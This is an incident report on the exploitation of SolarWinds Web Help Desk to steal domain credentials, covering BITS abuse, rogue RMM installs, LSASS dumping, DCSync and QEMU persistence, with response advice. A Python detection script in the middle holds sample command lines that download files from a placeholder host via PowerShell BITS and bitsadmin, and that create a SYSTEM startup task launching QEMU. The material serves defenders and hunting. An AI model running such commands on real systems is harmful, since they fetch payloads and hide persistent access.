Full Report
So many CVEs, so little time Digital intruders exploited buggy SolarWinds Web Help Desk (WHD) instances in December to break into victims' IT environments, move laterally, and steal high-privilege credentials, according to Microsoft researchers.…
Analysis Summary
# Incident Report: SolarWinds WHD Exploitation for Credential Theft
## Executive Summary
In December 2025, threat actors exploited vulnerabilities in SolarWinds Web Help Desk (WHD) instances to gain initial access to victim IT environments. Following successful breaches, attackers executed lateral movement, stole high-privilege credentials (including Domain Admins), and established long-term persistence using legitimate tools. Microsoft researchers discovered the activity, which focused on credential theft via techniques like DLL sideloading and potential DCSync attacks.
## Incident Details
- Discovery Date: Early February 2026 (Reported via Microsoft Blog on February 6, 2026)
- Incident Date: December 2025
- Affected Organization: Multiple victim organizations (Number undisclosed)
- Sector: Undisclosed (Implied IT/General Enterprise environments hosting WHD)
- Geography: Undisclosed
## Timeline of Events
### Initial Access
- Date/Time: December 2025
- Vector: Exploitation of a SolarWinds Web Help Desk (WHD) vulnerability (exact CVE pending confirmation, potentially CVE-2025-40551, CVE-2025-40536, or previously disclosed CVE-2025-26399).
- Details: Gained an initial foothold on victim systems vulnerable to one or more known WHD flaws.
### Lateral Movement
- Following initial access, attackers spawned PowerShell to abuse the built-in **Background Intelligent Transfer Service (BITS)** for payload download and execution.
- Attackers downloaded and installed the legitimate remote monitoring and management (RMM) product, **Zoho ManageEngine**, on several hosts to gain persistent remote control.
- Threat actors enumerated sensitive domain users and groups, specifically targeting Domain Admins.
### Data Exfiltration/Impact
- Attackers leveraged high-privilege credentials to execute a **DCSync** attack in at least one case, requesting password data directly from a domain controller.
- Credentials were harvested from Windows LSASS process memory, with DLL sideloading used to run the dumping code under the cover of a legitimate, signed binary.
- Persistence was established via reverse SSH and RDP access, and by creating scheduled tasks to launch QEMU virtual machines at startup to hide activity.
### Detection & Response
- Detection was performed by **Microsoft Defender**, which flagged attacker behavior, including the suspicious creation of the scheduled task/QEMU VM.
- Response actions recommended include immediate patching of WHD, credential rotation (especially for service/admin accounts linked to WHD), host isolation, and scanning for unauthorized RMM tools like ManageEngine.
## Attack Methodology
- **Initial Access:** Remote exploitation of SolarWinds WHD vulnerability (RCE or Security Bypass leading to execution).
- **Persistence:** Installation of Zoho ManageEngine RMM, establishing reverse SSH/RDP access, creation of scheduled tasks involving QEMU VM execution at startup.
- **Privilege Escalation:** Not directly observed, but implied by the DCSync activity, which requires domain replication rights (normally held only by Domain Admins and domain controllers).
- **Defense Evasion:** Living off the Land (LotL) techniques using native tools like BITS for payload delivery; hiding malicious activity inside a QEMU virtual machine launched as a system scheduled task.
- **Credential Access:** DLL sideloading targeting LSASS memory.
- **Discovery:** Enumeration of sensitive domain users and groups (including Domain Admins) using the installed RMM tool.
- **Lateral Movement:** Use of Zoho ManageEngine RMM for remote control across the network; potential internal network traversal via established persistence channels.
- **Collection:** Gathering credentials via LSASS memory dumping.
- **Exfiltration:** Execution of DCSync to extract password data from the Domain Controller.
- **Impact:** Compromise of high-privilege credentials leading to potential full domain takeover.
## Impact Assessment
- **Financial:** Not quantified, but likely high due to potential domain compromise and mandatory remediation efforts.
- **Data Breach:** High-privilege credentials, including Domain Admin account information (password hashes/secrets via DCSync).
- **Operational:** Disruption due to the investigation, host isolation, and mandatory patching/credential rotation.
- **Reputational:** Potential reputational damage related to the sustained breach originating from a third-party vendor application.
## Indicators of Compromise
- **Network indicators:** Reverse SSH/RDP connections originating from compromised WHD hosts; outbound connections associated with Zoho ManageEngine traffic.
- **File indicators:** Artifacts related to Zoho ManageEngine, specifically `ToolsIQ.exe`.
- **Behavioral indicators:** Use of PowerShell abusing **BITS** for file downloads; suspicious execution of OS utilities in conjunction with unexpected remote management software; creation of scheduled tasks launching QEMU VMs; abnormal LSASS memory access patterns.
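As an added hunting example (not from the report or from Microsoft), the following script scores constructed endpoint telemetry against the behavioral indicators listed above; the event schema, sample paths, the `192.0.2.10` address and the LSASS accessor allowlist are all assumptions.

```python
# Added hunting example: map constructed process/task/LSASS telemetry to the
# behavioral indicators of this report. Not the report's or Microsoft's code.
import re
from dataclasses import dataclass

@dataclass
class Event:
    kind: str          # "process" (creation), "task" (schtasks action) or "lsass_access"
    image: str         # acting process image path
    cmdline: str = ""  # command line, or the scheduled task's action
    target: str = ""   # target image (lsass_access events)

def basename(path: str) -> str:
    return path.replace("\\", "/").rsplit("/", 1)[-1].lower()

# Processes expected to open LSASS; constructed, illustrative allowlist, tune per estate.
LSASS_ALLOWLIST = {"csrss.exe", "wininit.exe", "msmpeng.exe", "services.exe"}
BITS_CMD = re.compile(r"Start-BitsTransfer|bitsadmin(\.exe)?\s+/transfer", re.I)

def classify(ev: Event) -> list[str]:
    """Return the indicator names an event matches (empty list if nothing fires)."""
    hits, img = [], basename(ev.image)
    if ev.kind == "process":
        if img in {"powershell.exe", "pwsh.exe", "bitsadmin.exe"} and BITS_CMD.search(ev.cmdline):
            hits.append("bits_download")            # LotL payload delivery via BITS
        if img == "toolsiq.exe" or "manageengine" in ev.image.lower():
            hits.append("unauthorized_rmm")         # ManageEngine artifact on a host
    if ev.kind == "task" and re.search(r"qemu", ev.cmdline, re.I):
        hits.append("qemu_scheduled_task")          # VM launched at startup to hide activity
    if ev.kind == "lsass_access" and basename(ev.target) == "lsass.exe" and img not in LSASS_ALLOWLIST:
        hits.append("unusual_lsass_access")         # credential dumping candidate
    return hits

def hunt(events: list[Event]) -> dict[str, list[Event]]:
    """Group matching events by indicator name for triage."""
    findings: dict[str, list[Event]] = {}
    for ev in events:
        for name in classify(ev):
            findings.setdefault(name, []).append(ev)
    return findings

# Constructed sample telemetry; paths and the 192.0.2.10 address are placeholders.
SAMPLE_EVENTS = [
    Event("process", r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
          cmdline="powershell -c Start-BitsTransfer -Source http://192.0.2.10/a.bin -Destination C:\\Users\\Public\\a.bin"),
    Event("process", r"C:\Windows\System32\bitsadmin.exe",
          cmdline="bitsadmin /transfer job /download http://192.0.2.10/b.bin C:\\ProgramData\\b.bin"),
    Event("task", r"C:\Windows\System32\schtasks.exe",
          cmdline=r"/create /sc onstart /ru SYSTEM /tn Updater /tr C:\ProgramData\qemu\qemu-system-x86_64.exe"),
    Event("process", r"C:\ProgramData\ManageEngine\ToolsIQ.exe"),
    Event("lsass_access", r"C:\Users\Public\update.exe", target=r"C:\Windows\System32\lsass.exe"),
    Event("lsass_access", r"C:\Windows\System32\csrss.exe", target=r"C:\Windows\System32\lsass.exe"),
    Event("process", r"C:\Windows\System32\notepad.exe", cmdline="notepad.exe"),
]

if __name__ == "__main__":
    for name, evs in hunt(SAMPLE_EVENTS).items():
        print(f"{name}: {[basename(e.image) for e in evs]}")
```

Each rule is intentionally narrow; in practice the BITS and LSASS rules need tuning against the estate's own baseline of legitimate BITS jobs and security-product LSASS access.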
## Response Actions
- **Containment:** Apply SolarWinds WHD patches immediately; isolate known compromised hosts from the rest of the network; block external access to application admin paths.
- **Eradication:** Scan for and forcibly remove unauthorized RMM tools, particularly Zoho ManageEngine artifacts like `ToolsIQ.exe`.
- **Recovery:** Rotate credentials, starting with service and administrative accounts reachable by the WHD server. Restore access using clean credentials across affected systems.
## Lessons Learned
- Third-party application vulnerabilities (like those in WHD) remain a critical initial access vector.
- Attackers are adept at chaining existing vulnerabilities to achieve complex objectives (e.g., CVE-2025-26399 bypassing older patches).
- Living off the Land (LotL) techniques using BITS for malware delivery complicate detection that relies solely on file signatures, because the downloader itself is a trusted, signed Windows component.
- Persistent unauthorized RMM tools are a major threat for long-term command and control and post-exploitation activities.
## Recommendations
- Immediately apply all available security patches for SolarWinds WHD (and monitor for future related zero-days).
- Restrict or eliminate public-facing access to administrative interfaces of all critical internal applications, especially WHD.
- Conduct aggressive hunting for unauthorized remote management software deployment (e.g., ManageEngine RMM artifacts).
- Review and restrict the use of built-in Windows features like BITS for non-standard activities.
- Implement stricter monitoring and alerting on LSASS process access, especially by unusual processes, and on DCSync operations.
- Require mandatory credential rotation for all accounts with elevated privileges on systems adjacent to software like WHD after any major security event.